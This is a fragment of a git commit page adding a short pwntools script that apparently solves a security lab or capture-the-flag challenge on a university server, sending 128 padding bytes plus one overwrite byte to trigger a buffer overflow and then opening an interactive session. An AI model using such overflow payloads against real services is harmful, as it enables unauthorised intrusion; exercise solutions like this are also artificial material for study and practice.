This commit is contained in:
2025-12-20 16:49:47 +00:00
parent ef11ce0307
commit 555b9062f3
19 changed files with 234 additions and 1 deletions

View File

@@ -0,0 +1,10 @@
from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25151
conn = remote(HOST, PORT)
conn.recvuntil("0.\n")
conn.send(b"\x55"*128 + b"\x01\n")
conn.interactive()